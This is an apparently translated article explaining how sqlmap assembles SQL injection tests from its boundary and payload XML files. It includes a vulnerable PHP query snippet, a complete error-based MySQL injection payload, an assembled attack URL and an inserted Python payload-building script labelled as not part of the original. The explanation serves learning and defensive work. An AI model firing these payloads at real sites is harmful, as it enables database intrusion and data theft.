Sqlmap's Past Life (PART1)

Source: Internet
Author: User
Tags: sql injection

http://www.freebuf.com/sectool/77948.html

I. Preface

When SQL injection comes up, the first tool that comes to mind is sqlmap, the open source tool for detecting and exploiting SQL injection. So what logic does sqlmap actually follow when it scans for SQL injection? This article explores sqlmap's scanning logic, with the aim of understanding it well enough to build your own SQL injection scanning tool.

II. SQL Scan Rules

To understand sqlmap's scanning rules, that is, its payloads, where they come from and by what logic they are generated, you first have to understand a few files. The scanning rule files live in the \xml folder: boundaries.xml and the payloads folder hold the scanning rules, and the six files in \xml\payloads store the payloads for the different injection techniques.
You then need to know two formats: the boundary file and the payloads files.

Example:

<boundary>
    <level>1</level>
    <clause>1</clause>
    <where>1,2</where>
    <ptype>1</ptype>
    <prefix>'</prefix>
    <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>
</boundary>

1. Clause and where property

These two elements restrict the scope in which a boundary is used. They can be understood as follows: if and only if the value of a boundary's where node contains the value of the test element's where node, and the value of the boundary's clause node contains the value of the test element's clause node, can the boundary be combined with the current test to generate a payload.

2. prefix and Suffix properties

To understand the role of these two properties, first look at a piece of code.

function getattachtablebypid($pid) {
    $tableid = DB::result_first("SELECT tableid FROM ".DB::table('forum_attachment')." WHERE pid='$pid' LIMIT 1");
    return 'forum_attachment_'.($tableid >= 0 && $tableid < 10 ? intval($tableid) : 'unused');
}

From the code we can see that $pid is concatenated directly into the SQL statement. So if the pid we supply is ' and 'test'='test, the SQL statement that is finally assembled will be:

SELECT tableid FROM ".DB::table('forum_attachment')." WHERE pid='' AND 'test'='test' LIMIT 1

So if we enter ' and 'test'='test, the final concatenated SQL statement is still legal. We can therefore put the test payload between the prefix and the suffix so that the final SQL stays legal and the injection test can be performed. In other words, the role of prefix and suffix is to close off the surrounding SQL statement so that the final payload is syntactically legal.
That explains the role of the boundary file; next comes the payload explanation.

<test>
    <title>MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
    <stype>2</stype>
    <level>1</level>
    <risk>1</risk>
    <clause>1</clause>
    <where>1</where>
    <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
    <request>
        <!-- these work as good as ELT(), but are longer
        <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
        <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
        -->
        <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
    </request>
    <response>
        <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
    </response>
    <details>
        <dbms>MySQL</dbms>
        <dbms_version>&gt;= 5.0</dbms_version>
    </details>
</test>

1. Title Property

The title property is the caption of the current test payload; from the title you can tell the injection technique being used and the type of database being tested.

2. Stype Properties

This property marks the type of injection technique: 1 is boolean-based blind injection and 2 is error-based injection.

3. Level Property

Every test has this property. Its role is to limit how deep the SQL injection test goes. In short, when you use sqlmap for SQL injection testing you need to specify the scan level; the default is 1 and the maximum is 5. The higher the level, the more tests are performed: if you specify level 5 for the injection test, an estimated 1000+ test methods are executed.

4. Clause and where property

The clause and where properties in a test have the same function as the clause and where properties in a boundary.

5. Payload Properties

This property is the SQL statement that will be tested and the key to sqlmap's scanning logic. In it, [RANDNUM], [DELIMITER_START] and [DELIMITER_STOP] stand for a random number and random delimiter characters respectively. When sqlmap scans, the corresponding random values are substituted in, and the result is spliced together with the boundary's prefix and suffix to become the final test payload.

6. Details Property

It generally has two child nodes. The dbms child node gives the database type the current payload applies to; in the current example its value is MySQL, meaning the payload applies to MySQL. The dbms_version child node gives the applicable database version.

7. Response Properties

The child nodes under this property mark the test method of the current test payload:

grep: error-based injection
comparison: boolean-based blind injection
time: time-based (delay) injection
char: UNION query injection

sqlmap's checkSqlInjection function uses this property as the basis for entering the different processing branches, and the value in the response property is the basis of its SQL injection judgment. In the current example the value in grep is [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]; sqlmap replaces [DELIMITER_START] and [DELIMITER_STOP] with the same replacement values used in the payload, then uses the resulting regular expression to match the returned page content. If there is a match, a SQL injection vulnerability is judged to exist.

It is important to note that the strings in the payload are processed according to the database type the current payload applies to; the code that does this processing is the syntax.py script in the corresponding database folder under \plugins\dbms.

So the final payload is built by combining the value of the test's payload child node with the prefix and suffix child nodes of the boundary, namely: final payload = URL parameter + boundary.prefix + test.payload + boundary.suffix
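As an added example (not sqlmap's own code, and not from the original article), the matching and assembly rules described above in Python. It loads a constructed boundary entry and a constructed test entry modelled on the ones quoted here, applies the where/clause matching rule, substitutes [RANDNUM], [DELIMITER_START], [DELIMITER_STOP] and [RANDSTR] with fixed values, hex-escapes the quoted strings the way the article says syntax.py does for MySQL, and splices prefix + payload + suffix. The second boundary, the table name in embed_in_query and the quote-balance check are assumptions added only to show the filter working and to show that the assembled payload leaves the surrounding statement syntactically legal.

```python
"""Assemble a sqlmap-style test payload from a boundary entry and a test entry.

Added example, not sqlmap's own code. The XML fixtures are constructed to
mirror the boundary and the error-based test quoted in the article; the
random values are fixed so the output is reproducible.
"""
import re
import xml.etree.ElementTree as ET

# Constructed fixture: the article's boundary plus a second one whose where
# value (3) will not match the test, so the filter can be seen rejecting it.
BOUNDARIES_XML = """<root>
  <boundary>
    <level>1</level><clause>1</clause><where>1,2</where><ptype>1</ptype>
    <prefix>'</prefix><suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>
  </boundary>
  <boundary>
    <level>1</level><clause>1</clause><where>3</where><ptype>1</ptype>
    <prefix>'</prefix><suffix></suffix>
  </boundary>
</root>"""

# Constructed fixture: the article's error-based test, reduced to its ELT() payload.
TESTS_XML = """<root>
  <test>
    <title>MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
    <stype>2</stype><level>1</level><risk>1</risk><clause>1</clause><where>1</where>
    <request>
      <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
    </request>
    <response><grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep></response>
    <details><dbms>MySQL</dbms><dbms_version>&gt;= 5.0</dbms_version></details>
  </test>
</root>"""


def _text(elem, tag):
    child = elem.find(tag)
    return (child.text or "") if child is not None else ""


def _set(value):
    # "1,2" -> {"1", "2"}; the where/clause nodes are comma-separated lists
    return {v.strip() for v in value.split(",") if v.strip()}


def load_boundaries(xml_text):
    return [{"level": int(_text(b, "level")), "clause": _set(_text(b, "clause")),
             "where": _set(_text(b, "where")), "prefix": _text(b, "prefix"),
             "suffix": _text(b, "suffix")}
            for b in ET.fromstring(xml_text).findall("boundary")]


def load_tests(xml_text):
    return [{"title": _text(t, "title"), "stype": int(_text(t, "stype")),
             "level": int(_text(t, "level")), "clause": _set(_text(t, "clause")),
             "where": _set(_text(t, "where")),
             "payload": _text(t.find("request"), "payload"),
             "grep": _text(t.find("response"), "grep")}
            for t in ET.fromstring(xml_text).findall("test")]


def boundary_matches(boundary, test):
    """The article's rule: the boundary's where and clause sets must each
    share a value with the test's where and clause sets."""
    return bool(boundary["where"] & test["where"]) and bool(boundary["clause"] & test["clause"])


def substitute(template, randnum, delim_start, delim_stop, randstr):
    out = template.replace("[RANDNUM]", str(randnum))
    out = out.replace("[DELIMITER_START]", delim_start).replace("[DELIMITER_STOP]", delim_stop)
    return out.replace("[RANDSTR]", randstr)


def mysql_escape(sql):
    """Rewrite each single-quoted literal as a 0x... hex literal, the MySQL
    treatment the article attributes to syntax.py (assumption: literals
    contain no escaped quotes)."""
    return re.sub(r"'([^']*)'",
                  lambda m: "0x" + m.group(1).encode().hex() if m.group(1) else m.group(0), sql)


def build_payload(boundary, test, randnum, delim_start, delim_stop, randstr):
    # Order from the article: substitute, escape the test payload, then splice
    # prefix + payload + suffix. The boundary text itself is not hex-escaped.
    body = mysql_escape(substitute(test["payload"], randnum, delim_start, delim_stop, randstr))
    prefix = substitute(boundary["prefix"], randnum, delim_start, delim_stop, randstr)
    suffix = substitute(boundary["suffix"], randnum, delim_start, delim_stop, randstr)
    return prefix + " " + body + suffix


def embed_in_query(value):
    """The vulnerable concatenation from the article's PHP snippet, redone in
    Python only to show the quotes still pair up (table name assumed)."""
    return "SELECT tableid FROM forum_attachment WHERE pid='%s' LIMIT 1" % value


def quotes_balanced(sql):
    return sql.count("'") % 2 == 0


def candidate_payloads(level, randnum, delim_start, delim_stop, randstr):
    """Every (boundary, test) pair allowed by the level and the matching rule."""
    return [build_payload(b, t, randnum, delim_start, delim_stop, randstr)
            for t in load_tests(TESTS_XML) if t["level"] <= level
            for b in load_boundaries(BOUNDARIES_XML)
            if b["level"] <= level and boundary_matches(b, t)]


if __name__ == "__main__":
    for p in candidate_payloads(1, 2214, "~!", "!~", "pujm"):
        print(p)
        print(embed_in_query(p), quotes_balanced(embed_in_query(p)))
```

With the article's values (2214, ~!, !~, pujm) the only surviving pair is the first boundary with the test, and the assembled string is the same form as the ad_id value shown in the examples section below: prefix quote, the hex-escaped ELT() payload, then AND 'pujm'='pujm.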

III. Examples

Next, error-based injection is used to explain how payload and boundary are used in practice.

In the example above, the value of the where node in the boundary element is 1,2, which contains the value of the test element's where node (1), and the value of the clause node in the boundary element is 1, which contains the value of the test element's clause node (1), so the boundary and test elements match. The value of the test element's payload is:

AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

We described the format of the final payload earlier, so the last step is to replace [RANDNUM], [DELIMITER_START] and [DELIMITER_STOP] and then escape the result.

The resulting payload is similar to the following:

[RANDNUM] = 2214
[DELIMITER_START] = ~! (0x7e21 after escaping)
[DELIMITER_STOP] = !~ (0x217e after escaping)
Payload: ' AND (SELECT 2214 FROM(SELECT COUNT(*),CONCAT(0x7e21,(SELECT (CASE WHEN (2214=2214) THEN 1 ELSE 0 END)),0x217e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND 'pujm'='pujm

If http://127.0.0.1/search-result.php?keyword=&ad_id=3 is injectable, executing this payload produces the following error:

Duplicate entry '~!1!~1' for key 'group_key'

According to the explanation above, the URL that is finally tested is as follows:

http://127.0.0.1/search-result.php?keyword=&ad_id=' AND (SELECT 2214 FROM(SELECT COUNT(*),CONCAT(0x7e21,(SELECT (ELT(2214=2214,1))),0x217e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ymrm'='ymrm

The following page information is returned:

Finally, the current page is matched against the regular expression in grep.

<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>

The regular expression actually used is ~!(?P<result>.*?)!~. Matching it against Duplicate entry '~!1!~1' for key 'group_key' gives result 1, and from this match it can be concluded that the current page does have SQL injection.

Summary

By going through sqlmap's scanning logic we can understand the general approach to, and implementation of, SQL injection testing. Once familiar with sqlmap's configuration files, you can modify payloads and boundaries to suit the actual situation, enhance sqlmap's scanning rules by adding payloads and boundaries, or reuse its scanning rules to build your own SQL injection scanning tool.

